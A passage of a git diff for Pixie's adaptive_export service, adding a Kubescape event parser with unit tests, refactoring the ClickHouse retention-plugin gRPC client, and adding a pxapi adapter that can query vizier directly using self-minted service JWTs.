+type k8sDetails struct { + PodName string `json:"podName"` + PodNamespace string `json:"podNamespace"` +} + +type processDetails struct { + ProcessTree struct { + PID uint64 `json:"pid"` + Comm string `json:"comm"` + } `json:"processTree"` +} + +// Extract parses a Row into an Event. Required fields are EventTime, +// RuleID, processTree.pid, processTree.comm. Pod and Namespace MAY be +// empty (host-pid processes outside any pod). Pure: no I/O, no clock. +func Extract(r Row) (Event, error) { + if r.RuleID == "" { + return Event{}, fmt.Errorf("%w: RuleID empty", ErrIncompleteEvent) + } + if r.EventTime == 0 { + return Event{}, fmt.Errorf("%w: EventTime zero", ErrIncompleteEvent) + } + // K8sDetails is OPTIONAL at parse time — host-pid events legitimately + // have no pod/namespace. We only error on malformed JSON. + var k8s k8sDetails + if r.K8sDetails != "" { + if err := json.Unmarshal([]byte(r.K8sDetails), &k8s); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeK8sDetails: %v", ErrIncompleteEvent, err) + } + } + var proc processDetails + if err := json.Unmarshal([]byte(r.ProcessDetails), &proc); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeProcessDetails: %v", ErrIncompleteEvent, err) + } + if proc.ProcessTree.Comm == "" { + return Event{}, fmt.Errorf("%w: processTree.comm empty", ErrIncompleteEvent) + } + if proc.ProcessTree.PID == 0 { + return Event{}, fmt.Errorf("%w: processTree.pid zero", ErrIncompleteEvent) + } + return Event{ + Target: anomaly.Target{ + PID: proc.ProcessTree.PID, + Comm: proc.ProcessTree.Comm, + Pod: k8s.PodName, + Namespace: k8s.PodNamespace, + }, + EventTime: r.EventTime, + RuleID: r.RuleID, + Hostname: r.Hostname, + }, nil +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go new file mode 100644 index 00000000000..90f10500d29 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go @@ -0,0 +1,141 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package kubescape + +import ( + "errors" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +const canonicalK8sDetails = `{"clusterName":"bobexample","containerName":"redis","namespace":"redis","podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis","workloadName":"redis","workloadKind":"Deployment"}` + +const canonicalProcessDetails = `{"processTree":{"pid":106040,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":105965,"uid":999}}` + +func canonicalRow() Row { + return Row{ + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + K8sDetails: canonicalK8sDetails, + ProcessDetails: canonicalProcessDetails, + } +} + +// TestExtract_FromCanonicalRow — pulls all four target fields plus +// EventTime + RuleID + Hostname from a real-shape kubescape row. 
+func TestExtract_FromCanonicalRow(t *testing.T) { + ev, err := Extract(canonicalRow()) + if err != nil { + t.Fatalf("Extract: %v", err) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Target.Comm != "redis-server" { + t.Fatalf("Comm = %q", ev.Target.Comm) + } + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.Namespace != "redis" { + t.Fatalf("Namespace = %q", ev.Target.Namespace) + } + if ev.EventTime != 1744477360303026359 { + t.Fatalf("EventTime = %d", ev.EventTime) + } + if ev.RuleID != "R1005" || ev.Hostname != "node-1" { + t.Fatalf("RuleID/Hostname wrong: %+v", ev) + } +} + +// TestExtract_AllowsEmptyPodNamespace — host-pid processes (no pod) +// must still produce a valid Event. +func TestExtract_AllowsEmptyPodNamespace(t *testing.T) { + row := canonicalRow() + row.K8sDetails = "" // host-pid: no k8s context + ev, err := Extract(row) + if err != nil { + t.Fatalf("Extract empty-k8s row: %v", err) + } + if ev.Target.Pod != "" || ev.Target.Namespace != "" { + t.Fatalf("expected empty Pod/Namespace, got %+v", ev.Target) + } + if ev.Target.PID != 106040 || ev.Target.Comm != "redis-server" { + t.Fatalf("PID/Comm lost: %+v", ev.Target) + } + // And the hash should still compute deterministically. + if h := anomaly.Hash(ev.Target); len(h) != 32 { + t.Fatalf("hash on empty-k8s target invalid: %q", h) + } +} + +// TestExtract_StableUnderJSONReorder — re-ordering JSON keys yields +// identical Target / Event. +func TestExtract_StableUnderJSONReorder(t *testing.T) { + r := canonicalRow() + r.K8sDetails = `{"workloadKind":"Deployment","podNamespace":"redis","podName":"redis-578d5dc9bd-kjj78","clusterName":"bobexample"}` + r.ProcessDetails = `{"processTree":{"comm":"redis-server","ppid":1,"pid":106040,"cmdline":"redis-server","uid":0}}` + a, errA := Extract(canonicalRow()) + b, errB := Extract(r) + if errA != nil || errB != nil { + t.Fatalf("Extract errors: a=%v b=%v", errA, errB) + } + if a.Target != b.Target { + t.Fatalf("Target differs under JSON reorder: %+v vs %+v", a.Target, b.Target) + } + if anomaly.Hash(a.Target) != anomaly.Hash(b.Target) { + t.Fatalf("Hash differs under JSON reorder") + } +} + +// TestExtract_RequiresProcessTreeComm — empty / missing comm errors. +func TestExtract_RequiresProcessTreeComm(t *testing.T) { + for _, p := range []string{"", `{"processTree":}`, `{}`, `{"processTree":{"pid":1}}`, `{"processTree":{"comm":"","pid":1}}`} { + row := canonicalRow() + row.ProcessDetails = p + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("proc=%q → %v, want ErrIncompleteEvent", p, err) + } + } +} + +// TestExtract_RequiresProcessTreePID — pid is required for hash uniqueness. +func TestExtract_RequiresProcessTreePID(t *testing.T) { + row := canonicalRow() + row.ProcessDetails = `{"processTree":{"comm":"redis-server","pid":0}}` + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("got %v, want ErrIncompleteEvent for pid=0", err) + } +} + +// TestExtract_RequiresEventTimeAndRuleID — both required. 
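The contract these tests pin down is easiest to see from the calling side. A minimal consumer sketch, where `processRow` and its callback are illustrative and not part of this PR:

```go
package consumer

import (
	"errors"

	"px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
)

// processRow drops incomplete rows (expected in practice), surfaces any
// other error, and hands complete events to a caller-supplied callback.
func processRow(r kubescape.Row, handle func(kubescape.Event)) error {
	ev, err := kubescape.Extract(r)
	if errors.Is(err, kubescape.ErrIncompleteEvent) {
		return nil // skip partial rows; don't abort the poll loop
	}
	if err != nil {
		return err
	}
	handle(ev)
	return nil
}
```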
+func TestExtract_RequiresEventTimeAndRuleID(t *testing.T) {
+	r := canonicalRow()
+	r.EventTime = 0
+	if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) {
+		t.Fatalf("EventTime=0 not rejected: %v", err)
+	}
+	r = canonicalRow()
+	r.RuleID = ""
+	if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) {
+		t.Fatalf("RuleID='' not rejected: %v", err)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/pixie/pixie.go b/src/vizier/services/adaptive_export/internal/pixie/pixie.go
index 97e5bb8ae23..67eeef3cd20 100644
--- a/src/vizier/services/adaptive_export/internal/pixie/pixie.go
+++ b/src/vizier/services/adaptive_export/internal/pixie/pixie.go
@@ -14,30 +14,37 @@
 //
 // SPDX-License-Identifier: Apache-2.0
 
+// Package pixie is a thin gRPC wrapper around Pixie cloud's
+// PluginService — used by adaptive_export at boot only, to ensure the
+// ClickHouse retention plugin is enabled. Retention scripts themselves
+// (the PxL that Pixie runs to populate forensic_db.<table>) are
+// user-defined via the Pixie UI; this package does NOT manage them.
 package pixie
 
 import (
 	"context"
 	"crypto/tls"
 	"fmt"
+	"net"
 	"strings"
 
 	"github.com/gogo/protobuf/types"
 	"google.golang.org/grpc"
 	"google.golang.org/grpc/credentials"
 	"google.golang.org/grpc/metadata"
+
 	"px.dev/pixie/src/api/go/pxapi/utils"
 	"px.dev/pixie/src/api/proto/cloudpb"
 	"px.dev/pixie/src/api/proto/uuidpb"
 	"px.dev/pixie/src/vizier/services/adaptive_export/internal/script"
 )
 
 const (
-	clickhousePluginId = "clickhouse"
-	exportUrlConfig    = "exportURL"
+	clickhousePluginID = "clickhouse"
+	exportURLConfig    = "exportURL"
 )
 
+// Client wraps a gRPC connection to Pixie cloud's PluginService.
 type Client struct {
 	cloudAddr string
 	ctx       context.Context
@@ -46,99 +53,98 @@ type Client struct {
 	pluginClient cloudpb.PluginServiceClient
 }
 
+// NewClient dials the Pixie cloud and authenticates with apiKey via
+// the per-call metadata header.
 func NewClient(ctx context.Context, apiKey string, cloudAddr string) (*Client, error) {
 	if apiKey == "" {
-		fmt.Println("WARNING: API key is empty!")
+		return nil, fmt.Errorf("pixie: empty API key")
 	}
-
 	c := &Client{
 		cloudAddr: cloudAddr,
 		ctx:       metadata.AppendToOutgoingContext(ctx, "pixie-api-key", apiKey),
 	}
-
 	if err := c.init(); err != nil {
 		return nil, err
 	}
-
 	return c, nil
 }
 
 func (c *Client) init() error {
-	isInternal := strings.ContainsAny(c.cloudAddr, "cluster.local")
-
-	tlsConfig := &tls.Config{InsecureSkipVerify: isInternal}
+	host := c.cloudAddr
+	if h, _, err := net.SplitHostPort(c.cloudAddr); err == nil {
+		host = h
+	}
+	isInternal := host == "cluster.local" || strings.HasSuffix(host, ".cluster.local")
+	tlsConfig := &tls.Config{
+		InsecureSkipVerify: isInternal, //nolint:gosec // in-cluster vizier traffic only
+		MinVersion:         tls.VersionTLS12,
+	}
 	creds := credentials.NewTLS(tlsConfig)
-
 	conn, err := grpc.Dial(c.cloudAddr, grpc.WithTransportCredentials(creds))
 	if err != nil {
 		return err
 	}
-
 	c.grpcConn = conn
 	c.pluginClient = cloudpb.NewPluginServiceClient(conn)
 	return nil
 }
 
+// ClickHousePluginConfig is the minimal config the ensure-on path needs.
+type ClickHousePluginConfig struct {
+	ExportURL string
+}
+
+// GetClickHousePlugin returns the ClickHouse retention plugin descriptor,
+// or an error if it is not registered with the cloud.
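The boot-time call sequence the package doc describes would look roughly like this. A sketch only: the env variable names and the ClickHouse URL are illustrative, not wiring this PR defines.

```go
package main

import (
	"context"
	"log"
	"os"

	"px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie"
)

func main() {
	c, err := pixie.NewClient(context.Background(),
		os.Getenv("PX_API_KEY"), os.Getenv("PX_CLOUD_ADDR"))
	if err != nil {
		log.Fatal(err)
	}
	// Idempotent ensure-on; see EnsureClickHousePluginEnabled below.
	exportURL, err := c.EnsureClickHousePluginEnabled("http://clickhouse.forensic.svc:8123")
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("retention plugin active, exporting to %s", exportURL)
}
```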
func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) { - req := &cloudpb.GetPluginsRequest{ - Kind: cloudpb.PK_RETENTION, - } + req := &cloudpb.GetPluginsRequest{Kind: cloudpb.PK_RETENTION} resp, err := c.pluginClient.GetPlugins(c.ctx, req) if err != nil { return nil, err } for _, plugin := range resp.Plugins { - if plugin.Id == clickhousePluginId { + if plugin.Id == clickhousePluginID { return plugin, nil } } - return nil, fmt.Errorf("the %s plugin could not be found", clickhousePluginId) -} - -type ClickHousePluginConfig struct { - ExportUrl string + return nil, fmt.Errorf("pixie: %s plugin not found", clickhousePluginID) } +// GetClickHousePluginConfig returns the current org-level config (the +// ExportURL the retention plugin is currently writing to), falling back +// to the plugin's default if no custom URL is set. func (c *Client) GetClickHousePluginConfig() (*ClickHousePluginConfig, error) { - req := &cloudpb.GetOrgRetentionPluginConfigRequest{ - PluginId: clickhousePluginId, - } + req := &cloudpb.GetOrgRetentionPluginConfigRequest{PluginId: clickhousePluginID} resp, err := c.pluginClient.GetOrgRetentionPluginConfig(c.ctx, req) if err != nil { return nil, err } - exportUrl := resp.CustomExportUrl - if exportUrl == "" { - exportUrl, err = c.getDefaultClickHouseExportUrl() + exportURL := resp.CustomExportUrl + if exportURL == "" { + info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, + &cloudpb.GetRetentionPluginInfoRequest{PluginId: clickhousePluginID}) if err != nil { return nil, err } + exportURL = info.DefaultExportURL } - return &ClickHousePluginConfig{ - ExportUrl: exportUrl, - }, nil -} - -func (c *Client) getDefaultClickHouseExportUrl() (string, error) { - req := &cloudpb.GetRetentionPluginInfoRequest{ - PluginId: clickhousePluginId, - } - info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, req) - if err != nil { - return "", err - } - return info.DefaultExportURL, nil + return &ClickHousePluginConfig{ExportURL: exportURL}, nil } +// EnableClickHousePlugin turns the plugin on with the supplied +// ExportURL. Idempotent on the cloud side: calling Enable when already +// enabled re-applies the same config without effect. DisablePresets is +// true so existing user-defined retention scripts (the source of truth +// for what gets written) are not overwritten by Pixie's preset set. func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version string) error { req := &cloudpb.UpdateRetentionPluginConfigRequest{ - PluginId: clickhousePluginId, + PluginId: clickhousePluginID, Configs: map[string]string{ - exportUrlConfig: config.ExportUrl, + exportURLConfig: config.ExportURL, }, Enabled: &types.BoolValue{Value: true}, Version: &types.StringValue{Value: version}, - CustomExportUrl: &types.StringValue{Value: config.ExportUrl}, + CustomExportUrl: &types.StringValue{Value: config.ExportURL}, InsecureTLS: &types.BoolValue{Value: false}, DisablePresets: &types.BoolValue{Value: true}, } @@ -146,6 +152,11 @@ func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version return err } +// GetPresetScripts returns the ClickHouse-plugin preset retention scripts. +// These are the canonical http_events / dns_events / … bulk-write PxL +// scripts the plugin ships with. INSTALL_PRESET_SCRIPTS=true on the +// adaptive_export operator boot path uses this to bootstrap a cluster +// that has no user-defined retention scripts yet (DEMO PATH). 
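A sketch of that demo bootstrap, under stated assumptions: the `ScriptDefinition` field names (`Name`, `Description`, `FrequencyS`, `Contents`) are guesses, since the struct lives in the `script` package outside this hunk. Read this as shape, not API.

```go
package boot

import "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie"

// installPresets copies every preset retention script onto one cluster.
// Field names on sd are assumptions (see the note above).
func installPresets(c *pixie.Client, clusterID string) error {
	presets, err := c.GetPresetScripts()
	if err != nil {
		return err
	}
	for _, sd := range presets {
		if err := c.AddDataRetentionScript(clusterID,
			sd.Name, sd.Description, sd.FrequencyS, sd.Contents); err != nil {
			return err
		}
	}
	return nil
}
```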
func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) if err != nil { @@ -153,7 +164,7 @@ func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { } var l []*script.ScriptDefinition for _, s := range resp.Scripts { - if s.PluginId == clickhousePluginId && s.IsPreset { + if s.PluginId == clickhousePluginID && s.IsPreset { sd, err := c.getScriptDefinition(s) if err != nil { return nil, err @@ -164,39 +175,38 @@ func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { return l, nil } -func (c *Client) GetClusterScripts(clusterId, clusterName string) ([]*script.Script, error) { +// GetClusterScripts returns the retention scripts CURRENTLY installed on +// clusterID. Caller diffs against GetPresetScripts to figure out what +// to add / update / delete. +func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Script, error) { resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) if err != nil { return nil, err } var l []*script.Script for _, s := range resp.Scripts { - if s.PluginId == clickhousePluginId { + if s.PluginId == clickhousePluginID { sd, err := c.getScriptDefinition(s) if err != nil { return nil, err } + cIDs := "" + for i, id := range s.ClusterIDs { + if i > 0 { + cIDs += "," + } + cIDs += utils.ProtoToUUIDStr(id) + } l = append(l, &script.Script{ ScriptDefinition: *sd, ScriptId: utils.ProtoToUUIDStr(s.ScriptID), - ClusterIds: getClusterIdsAsString(s.ClusterIDs), + ClusterIds: cIDs, }) } } return l, nil } -func getClusterIdsAsString(clusterIDs []*uuidpb.UUID) string { - scriptClusterId := "" - for i, id := range clusterIDs { - if i > 0 { - scriptClusterId = scriptClusterId + "," - } - scriptClusterId = scriptClusterId + utils.ProtoToUUIDStr(id) - } - return scriptClusterId -} - func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.ScriptDefinition, error) { resp, err := c.pluginClient.GetRetentionScript(c.ctx, &cloudpb.GetRetentionScriptRequest{ID: s.ScriptID}) if err != nil { @@ -211,37 +221,58 @@ func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.Script }, nil } -func (c *Client) AddDataRetentionScript(clusterId string, scriptName string, description string, frequencyS int64, contents string) error { +// DeleteDataRetentionScript removes the script with the given UUID. +// Used by INSTALL_PRESET_SCRIPTS to purge stale scripts that target +// tables no longer in the schema. +func (c *Client) DeleteDataRetentionScript(scriptID string) error { + req := &cloudpb.DeleteRetentionScriptRequest{ + ID: utils.ProtoFromUUIDStrOrNil(scriptID), + } + _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) + return err +} + +// AddDataRetentionScript creates a new retention script on clusterID, +// running every frequencyS seconds with the given PxL contents. 
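And the inverse direction: the purge that `DeleteDataRetentionScript` (defined just below) exists for. Matching scripts by name is an assumption for illustration; the PR's real diffing logic lives in the controller, which this section doesn't show. `s.ScriptId` is the only field grounded in this hunk.

```go
package boot

import "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie"

// purgeStale deletes every cluster script whose name is not in keep.
// s.Name (via the embedded ScriptDefinition) is an assumed field.
func purgeStale(c *pixie.Client, clusterID, clusterName string, keep map[string]bool) error {
	scripts, err := c.GetClusterScripts(clusterID, clusterName)
	if err != nil {
		return err
	}
	for _, s := range scripts {
		if keep[s.Name] {
			continue
		}
		if err := c.DeleteDataRetentionScript(s.ScriptId); err != nil {
			return err
		}
	}
	return nil
}
```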
+func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, description string, frequencyS int64, contents string) error { req := &cloudpb.CreateRetentionScriptRequest{ ScriptName: scriptName, Description: description, FrequencyS: frequencyS, Contents: contents, - ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterId)}, - PluginId: clickhousePluginId, + ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterID)}, + PluginId: clickhousePluginID, } _, err := c.pluginClient.CreateRetentionScript(c.ctx, req) return err } -func (c *Client) UpdateDataRetentionScript(clusterId string, scriptId string, scriptName string, description string, frequencyS int64, contents string) error { - req := &cloudpb.UpdateRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptId), - ScriptName: &types.StringValue{Value: scriptName}, - Description: &types.StringValue{Value: description}, - Enabled: &types.BoolValue{Value: true}, - FrequencyS: &types.Int64Value{Value: frequencyS}, - Contents: &types.StringValue{Value: contents}, - ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterId)}, - } - _, err := c.pluginClient.UpdateRetentionScript(c.ctx, req) - return err -} - -func (c *Client) DeleteDataRetentionScript(scriptId string) error { - req := &cloudpb.DeleteRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptId), +// EnsureClickHousePluginEnabled is the boot-time idempotent op the +// operator calls in main.go. If the plugin is already enabled with a +// non-empty ExportURL, no-op. Otherwise, enable it with the supplied +// fallback URL. Returns the resolved ExportURL for diagnostics. +func (c *Client) EnsureClickHousePluginEnabled(fallbackExportURL string) (string, error) { + plugin, err := c.GetClickHousePlugin() + if err != nil { + return "", err } - _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) - return err + if plugin.RetentionEnabled { + cfg, err := c.GetClickHousePluginConfig() + if err != nil { + return "", err + } + if cfg.ExportURL != "" { + return cfg.ExportURL, nil + } + } + if fallbackExportURL == "" { + return "", fmt.Errorf("pixie: plugin not enabled and no fallback ExportURL provided") + } + if err := c.EnableClickHousePlugin( + &ClickHousePluginConfig{ExportURL: fallbackExportURL}, + plugin.LatestVersion, + ); err != nil { + return "", err + } + return fallbackExportURL, nil } diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel new file mode 100644 index 00000000000..5965e699cf2 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel @@ -0,0 +1,30 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") + +go_library( + name = "pixieapi", + srcs = ["pixieapi.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/api/go/pxapi", + "//src/api/go/pxapi/errdefs", + "//src/api/go/pxapi/types", + "//src/shared/services/utils", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go new file mode 100644 index 00000000000..651fb5c7fd1 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go @@ -0,0 +1,218 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package pixieapi adapts pxapi to a flat-row Pixie interface for the +// controller. Use when the operator (not the cloud's retention plugin) +// is the writer of pixie observation rows — necessary on deployments +// where the cloud can't reach an internal ClickHouse endpoint. +package pixieapi + +import ( + "context" + "errors" + "fmt" + "os" + "sync" + + "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/api/go/pxapi/errdefs" + "px.dev/pixie/src/api/go/pxapi/types" + jwtutils "px.dev/pixie/src/shared/services/utils" +) + +// Row is a flat per-pixie-row map[col]any. Compatible with sink's +// per-row JSONEachRow encoder. +type Row map[string]any + +// Adapter executes PxL via pxapi and returns flat rows. +type Adapter struct { + client *pxapi.Client + clusterID string + // directOpts, when non-nil, makes Query rebuild a pxapi.Client per + // call with a freshly-minted service JWT in WithBearerAuth. Used + // for direct-mode (in-cluster vizier-query-broker), where the cloud + // passthrough proxy is bypassed entirely. JWTs are minted fresh + // because GenerateJWTForService produces 10-minute claims and we + // want each fan-out window to carry its own valid token. + directOpts *DirectOptions +} + +// DirectOptions configures direct-mode connection to vizier in-cluster. +// Use when the cloud's passthrough proxy can't authorize the operator's +// API key (e.g. self-hosted clouds where API keys are scoped per-cluster +// and a freshly-deployed cluster isn't yet linked to the key's owner). +type DirectOptions struct { + // VizierAddr is the in-cluster gRPC endpoint, typically + // "vizier-query-broker-svc.pl.svc.cluster.local:50300". + VizierAddr string + // SigningKey is the cluster's JWT signing key, mounted from + // pl-cluster-secrets/jwt-signing-key. + SigningKey string + // ServiceID is the issuer-side service identifier (claim "sub"). + // Defaults to "adaptive_export" if empty. + ServiceID string +} + +// New constructs an Adapter wired to the cluster's vizier via cloud passthrough. 
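How the two constructors might be chosen at runtime, as a hedged sketch: the fallback ordering and env names are illustrative, and `pxapi.WithAPIKey` is the standard pxapi option for passthrough auth.

```go
package wiring

import (
	"context"
	"os"

	"px.dev/pixie/src/api/go/pxapi"
	"px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi"
)

// newAdapter prefers direct mode when its env is present and falls back
// to cloud passthrough otherwise.
func newAdapter(ctx context.Context, clusterID string) (*pixieapi.Adapter, error) {
	if a, err := pixieapi.NewDirectFromEnv(clusterID); err == nil {
		return a, nil
	}
	c, err := pxapi.NewClient(ctx,
		pxapi.WithAPIKey(os.Getenv("PX_API_KEY")),
		pxapi.WithCloudAddr(os.Getenv("PX_CLOUD_ADDR")))
	if err != nil {
		return nil, err
	}
	return pixieapi.New(c, clusterID), nil
}
```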
+func New(client *pxapi.Client, clusterID string) *Adapter { + return &Adapter{client: client, clusterID: clusterID} +} + +// NewDirect constructs an Adapter that bypasses the pixie cloud and +// connects directly to the in-cluster vizier-query-broker. Each Query +// call rebuilds the gRPC client with a fresh service JWT. +func NewDirect(clusterID string, opts DirectOptions) *Adapter { + if opts.ServiceID == "" { + opts.ServiceID = "adaptive_export" + } + return &Adapter{clusterID: clusterID, directOpts: &opts} +} + +// NewDirectFromEnv builds a direct-mode Adapter from the runtime env. +// Reads ADAPTIVE_VIZIER_DIRECT_ADDR for the broker addr and +// PL_JWT_SIGNING_KEY for the signing key (matching kelvin/metadata +// pod env conventions). Returns an error if either is missing. +// +// The caller MUST also set PX_DISABLE_TLS=1 in the operator pod — +// pxapi's WithDisableTLSVerification only sets InsecureSkipVerify when +// that env is "1" AND the addr contains "cluster.local"; without it, +// pxapi log.Fatal's at NewClient time. We accept skip-verify because +// query-broker's TLS uses a self-signed in-cluster CA we don't have a +// clean way to mount here. +func NewDirectFromEnv(clusterID string) (*Adapter, error) { + addr := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR") + if addr == "" { + return nil, errors.New("pixieapi: ADAPTIVE_VIZIER_DIRECT_ADDR not set") + } + sk := os.Getenv("PL_JWT_SIGNING_KEY") + if sk == "" { + return nil, errors.New("pixieapi: PL_JWT_SIGNING_KEY not set (mount pl-cluster-secrets/jwt-signing-key)") + } + return NewDirect(clusterID, DirectOptions{VizierAddr: addr, SigningKey: sk}), nil +} + +// Query executes pxl on the configured cluster and aggregates every +// emitted record from every table into one []Row. +func (a *Adapter) Query(ctx context.Context, pxl string) ([]Row, error) { + client := a.client + if a.directOpts != nil { + // Direct mode: build fresh client + fresh service JWT for each + // query. JWT is 10-min; fan-out is seconds, so this is safe. + jwt, err := jwtutils.SignJWTClaims( + jwtutils.GenerateJWTForService(a.directOpts.ServiceID, "vizier"), + a.directOpts.SigningKey, + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: sign JWT: %w", err) + } + // pxapi.Client doesn't expose a Close — its grpc.ClientConn is + // unexported. We accept GC-time reclamation: a Query in direct + // mode runs once per anomaly window per refresh interval (≥30s + // in production), so the per-query connection-leak rate is + // bounded and matched by goroutine + JWT expiry every ~10min. + // If we ever build a high-throughput direct-mode path, swap to + // a long-lived client + JWT-refresh ticker instead. 
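+	// Sketch of that long-lived alternative (NOT this PR): keep one
+	// client and refresh the bearer token on a ticker shorter than the
+	// 10-minute claim lifetime, e.g.:
+	//
+	//	tick := time.NewTicker(8 * time.Minute)
+	//	go func() {
+	//		for range tick.C {
+	//			jwt, _ := jwtutils.SignJWTClaims(
+	//				jwtutils.GenerateJWTForService(a.directOpts.ServiceID, "vizier"),
+	//				a.directOpts.SigningKey)
+	//			swapClientLocked(jwt) // hypothetical helper
+	//		}
+	//	}()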
+ c, err := pxapi.NewClient(ctx, + pxapi.WithCloudAddr(a.directOpts.VizierAddr), + pxapi.WithDisableTLSVerification(a.directOpts.VizierAddr), + pxapi.WithBearerAuth(jwt), + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: direct dial: %w", err) + } + client = c + } + vz, err := client.NewVizierClient(ctx, a.clusterID) + if err != nil { + return nil, fmt.Errorf("pixieapi: vizier dial: %w", err) + } + mux := newCollector() + rs, err := vz.ExecuteScript(ctx, pxl, mux) + if err != nil { + return nil, fmt.Errorf("pixieapi: ExecuteScript: %w", err) + } + defer rs.Close() + if err := rs.Stream(); err != nil { + if errdefs.IsCompilationError(err) { + return nil, fmt.Errorf("pixieapi: PxL compilation: %w", err) + } + return nil, fmt.Errorf("pixieapi: stream: %w", err) + } + return mux.rows(), nil +} + +type collector struct { + mu sync.Mutex + all []Row +} + +func newCollector() *collector { return &collector{} } + +func (c *collector) AcceptTable(_ context.Context, _ types.TableMetadata) (pxapi.TableRecordHandler, error) { + return &tableHandler{out: c}, nil +} + +func (c *collector) rows() []Row { + c.mu.Lock() + defer c.mu.Unlock() + return append([]Row(nil), c.all...) +} + +type tableHandler struct { + out *collector + meta types.TableMetadata +} + +func (h *tableHandler) HandleInit(_ context.Context, md types.TableMetadata) error { + h.meta = md + return nil +} + +func (h *tableHandler) HandleRecord(_ context.Context, rec *types.Record) error { + row := make(Row, len(h.meta.ColInfo)) + for _, col := range h.meta.ColInfo { + datum := rec.GetDatum(col.Name) + if datum == nil { + continue + } + row[col.Name] = datumValue(datum) + } + h.out.mu.Lock() + h.out.all = append(h.out.all, row) + h.out.mu.Unlock() + return nil +} + +func (h *tableHandler) HandleDone(_ context.Context) error { return nil } + +func datumValue(d types.Datum) any { + switch v := d.(type) { + case *types.BooleanValue: + return v.Value() + case *types.Int64Value: + return v.Value() + case *types.Float64Value: + return v.Value() + case *types.StringValue: + return v.Value() + case *types.Time64NSValue: + return v.Value() + case *types.UInt128Value: + return v.Value() + default: + return d.String() + } +} diff --git 